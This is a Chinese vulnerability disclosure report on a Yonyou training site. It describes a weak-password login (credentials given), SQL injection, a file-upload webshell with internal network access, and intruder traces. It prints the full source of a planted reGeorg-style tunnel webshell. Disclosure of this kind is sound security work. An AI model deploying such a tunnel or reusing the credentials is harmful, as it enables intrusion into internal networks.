从一个弱口令到Getshell用友某站点(可深入内网&已发现入侵者痕迹)
1.某站点未设置验证码:简单测试后拿到一个账号:http://lexue.yonyou.comtest1/123456
2.发现某处SQL注入登录后对站点进行简单测试,发现存在一处报错注入:
不深入测试,估计还存在注入,请自查!
3.个人资料头像处存在文件任意上传
经过测试后发现,上传正常的菜刀马会出现错误报错,无法正常解析aspx。
上传后,通过抓包可得到完整上传路径:
发现该服务器与内网相通:
[*] 基本信息 [ A:C:D:L: ]
D:PX20150204WebsiteUploadPXSystemdefault> whoami
nt authoritynetwork service
D:PX20150204WebsiteUpLoadPXSystemdefault> nslookup yonyou.com
鏈嶅姟鍣? bg-dc-01.ufsoft.com.cn
Address: 192.168.8.119
鍚嶇О: yonyou.com.com.cn
Address: 202.106.199.34
4.发现入侵痕迹:同目录下发现文件:20151002173504600358.aspx
f
可确定入侵时间点为:去年10月2号。发现提权神器:
通过查找目录,发现D:PX20150204WebsiteUploadLogtunnel.ashx
using System;
using System.Web;
using System.Net;
using System.Net.Sockets;
public class GenericHandler1 : IHttpHandler, System.Web.SessionState.IRequiresSessionState
{
public void ProcessRequest (HttpContext context) {
try
{
if (context.Request.HttpMethod == "POST")
{
String cmd = context.Request.QueryString.Get("cmd").ToUpper();
if (cmd == "CONNECT")
{
try
{
String target = context.Request.QueryString.Get("target").ToUpper();
int port = int.Parse(context.Request.QueryString.Get("port"));
IPAddress ip = IPAddress.Parse(target);
System.Net.IPEndPoint remoteEP = new IPEndPoint(ip, port);
Socket sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
sender.Connect(remoteEP);
sender.Blocking = false;
context.Session["socket"] = sender;
context.Response.AddHeader("X-STATUS", "OK");
}
catch (Exception ex)
{
context.Response.AddHeader("X-ERROR", ex.Message);
context.Response.AddHeader("X-STATUS", "FAIL");
}
}
else if (cmd == "DISCONNECT")
{
try
{
Socket s = (Socket)context.Session["socket"];
s.Close();
}
catch (Exception ex)
{
}
context.Session.Abandon();
context.Response.AddHeader("X-STATUS", "OK");
}
else if (cmd == "FORWARD")
{
Socket s = (Socket)context.Session["socket"];
try
{
int buffLen = context.Request.ContentLength;
byte[] buff = new byte[buffLen];
int c = 0;
while ((c = context.Request.InputStream.Read(buff, 0, buff.Length)) > 0)
{
s.Send(buff);
}
context.Response.AddHeader("X-STATUS", "OK");
}
catch (Exception ex)
{
context.Response.AddHeader("X-ERROR", ex.Message);
context.Response.AddHeader("X-STATUS", "FAIL");
}
}
else if (cmd == "READ")
{
Socket s = (Socket)context.Session["socket"];
try
{
int c = 0;
byte[] readBuff = new byte[512];
try
{
while ((c = s.Receive(readBuff)) > 0)
{
byte[] newBuff = new byte[c];
Array.ConstrainedCopy(readBuff, 0, newBuff, 0, c);
context.Response.BinaryWrite(newBuff);
}
context.Response.AddHeader("X-STATUS", "OK");
}
catch (SocketException soex)
{
context.Response.AddHeader("X-STATUS", "OK");
return;
}
}
catch (Exception ex)
{
context.Response.AddHeader("X-ERROR", ex.Message);
context.Response.AddHeader("X-STATUS", "FAIL");
}
}
} else {
context.Response.Write("Georg says, 'All seems fine'");
}
}
catch (Exception exKak)
{
context.Response.AddHeader("X-ERROR", exKak.Message);
context.Response.AddHeader("X-STATUS", "FAIL");
}
}
public bool IsReusable {
get {
return false;
}
}
}
根据时间点分析:该文件创建于去年10月27日,可能该入侵者,上传文件并隐藏于log目录下,进行内网反弹,可深入进行内网渗透。由于未得到厂商允许,未进行深入渗透!